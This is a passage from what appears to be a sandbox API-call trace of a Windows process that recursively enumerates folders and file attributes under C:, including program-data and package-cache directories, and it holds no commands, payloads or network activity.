lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.392] FindFirstFileW (in: lpFileName="c:\\perflogs\\\\*", lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0x284da0 [0043.392] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.392] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.392] FindFirstFileW (in: lpFileName="c:\\perflogs\\admin\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.392] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.392] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.393] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.393] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0 [0043.393] FindClose (in: hFindFile=0x284da0 | out: hFindFile=0x284da0) returned 1 [0043.393] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.393] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.393] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.393] FindFirstFileW (in: lpFileName="c:\\recovery\\\\*", lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0x284da0 [0043.394] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.394] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.394] FindFirstFileW (in: lpFileName="c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285f28 [0043.395] FindNextFileW (in: hFindFile=0x285f28, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.395] FindNextFileW (in: hFindFile=0x285f28, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.395] FindNextFileW (in: hFindFile=0x285f28, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.395] FindNextFileW (in: hFindFile=0x285f28, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.396] FindClose (in: hFindFile=0x285f28 | out: hFindFile=0x285f28) returned 1 [0043.396] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0 [0043.396] FindClose (in: hFindFile=0x284da0 | out: hFindFile=0x284da0) returned 1 [0043.396] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.396] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.396] FindFirstFileW (in: lpFileName="c:\\users\\\\*", lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0x284da0 [0043.396] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.396] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.396] FindFirstFileW (in: lpFileName="c:\\users\\all users\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.396] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.397] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.397] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x286ea0 [0043.397] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.397] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.398] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288740 [0043.398] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.399] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.399] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2897e0 [0043.399] FindNextFileW (in: hFindFile=0x2897e0, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.399] FindNextFileW (in: hFindFile=0x2897e0, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.399] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x28a828 [0043.399] FindNextFileW (in: hFindFile=0x28a828, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.400] FindNextFileW (in: hFindFile=0x28a828, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.400] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x28b9b8 [0043.401] FindNextFileW (in: hFindFile=0x28b9b8, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.401] FindNextFileW (in: hFindFile=0x28b9b8, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.401] FindNextFileW (in: hFindFile=0x28b9b8, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.401] FindClose (in: hFindFile=0x28b9b8 | out: hFindFile=0x28b9b8) returned 1 [0043.401] FindNextFileW (in: hFindFile=0x28a828, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.401] FindClose (in: hFindFile=0x28a828 | out: hFindFile=0x28a828) returned 1 [0043.401] FindNextFileW (in: hFindFile=0x2897e0, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.401] FindClose (in: hFindFile=0x2897e0 | out: hFindFile=0x2897e0) returned 1 [0043.402] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.402] FindClose (in: hFindFile=0x288740 | out: hFindFile=0x288740) returned 1 [0043.402] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.402] FindClose (in: hFindFile=0x286ea0 | out: hFindFile=0x286ea0) returned 1 [0043.402] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.402] FindFirstFileW (in: lpFileName="c:\\users\\all users\\application data\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.402] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.402] FindFirstFileW (in: lpFileName="c:\\users\\all users\\desktop\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.403] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.403] FindFirstFileW (in: lpFileName="c:\\users\\all users\\documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.403] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.403] FindFirstFileW (in: lpFileName="c:\\users\\all users\\favorites\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.403] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.403] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.403] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.403] FindFirstFileW (in: lpFileName="c:\\users\\all users\\mozilla\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x286ea0 [0043.404] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.404] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.404] FindFirstFileW (in: lpFileName="c:\\users\\all users\\mozilla\\logs\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x287ee8 [0043.404] FindNextFileW (in: hFindFile=0x287ee8, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.404] FindNextFileW (in: hFindFile=0x287ee8, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.404] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74b72710, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x74b72710, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x76dd04b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa4)) returned 1 [0043.405] FindNextFileW (in: hFindFile=0x287ee8, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.405] FindClose (in: hFindFile=0x287ee8 | out: hFindFile=0x287ee8) returned 1 [0043.405] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.405] FindClose (in: hFindFile=0x286ea0 | out: hFindFile=0x286ea0) returned 1 [0043.405] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.405] FindFirstFileW (in: lpFileName="c:\\users\\all users\\oracle\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x286ea0 [0043.409] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.409] FindNextFileW (in: hFindFile=0x286ea0, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.410] FindClose (in: hFindFile=0x286ea0 | out: hFindFile=0x286ea0) returned 1 [0043.410] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.410] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x286ef8 [0043.411] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.411] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.411] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288850 [0043.412] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.412] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.412] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288948 [0043.413] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.413] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.413] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288a50 [0043.414] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.414] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.414] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x28c9a0 [0043.414] FindNextFileW (in: hFindFile=0x28c9a0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.415] FindNextFileW (in: hFindFile=0x28c9a0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.415] FindNextFileW (in: hFindFile=0x28c9a0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.415] FindClose (in: hFindFile=0x28c9a0 | out: hFindFile=0x28c9a0) returned 1 [0043.415] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.415] FindClose (in: hFindFile=0x288a50 | out: hFindFile=0x288a50) returned 1 [0043.415] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.415] FindClose (in: hFindFile=0x288948 | out: hFindFile=0x288948) returned 1 [0043.415] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.415] FindClose (in: hFindFile=0x288850 | out: hFindFile=0x288850) returned 1 [0043.416] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.416] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288850 [0043.428] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.428] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.428] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288948 [0043.429] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.429] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.429] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288a50 [0043.429] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.429] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.430] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x288b58 [0043.430] FindNextFileW (in: hFindFile=0x288b58, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.430] FindNextFileW (in: hFindFile=0x288b58, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.430] FindNextFileW (in: hFindFile=0x288b58, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.430] FindClose (in: hFindFile=0x288b58 | out: hFindFile=0x288b58) returned 1 [0043.430] FindNextFileW (in: hFindFile=0x288a50, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.430] FindClose (in: hFindFile=0x288a50 | out: hFindFile=0x288a50) returned 1 [0043.430] FindNextFileW (in: hFindFile=0x288948, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.430] FindClose (in: hFindFile=0x288948 | out: hFindFile=0x288948) returned 1 [0043.431] FindNextFileW (in: hFindFile=0x288850, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.431] FindClose (in: hFindFile=0x288850 | out: hFindFile=0x288850) returned 1 [0043.431] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.431] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.452] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.452] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.452] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.452] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.453] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.453] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.456] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.456] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.456] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6014500, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe6014500, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe6014500, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0xf36be)) returned 1 [0043.457] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.457] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.457] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.457] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.458] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.458] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.458] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.458] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.458] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288798 [0043.458] FindNextFileW (in: hFindFile=0x288798, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.458] FindNextFileW (in: hFindFile=0x288798, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.458] FindNextFileW (in: hFindFile=0x288798, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.459] FindNextFileW (in: hFindFile=0x288798, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.459] FindClose (in: hFindFile=0x288798 | out: hFindFile=0x288798) returned 1 [0043.459] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.459] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.460] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.460] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.460] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.461] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.461] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.461] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.462] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.462] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.462] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66936b00, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x66936b00, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x66936b00, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x13babb)) returned 1 [0043.467] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.467] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.467] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.467] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.467] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.467] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.467] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.467] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.471] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.472] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.472] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.472] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.473] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.473] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.473] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.474] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.474] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.474] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f5c500, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x68f5c500, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x68f5c500, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e)) returned 1 [0043.475] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.475] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.475] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.475] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.475] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.475] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.476] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.476] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.476] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.476] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) 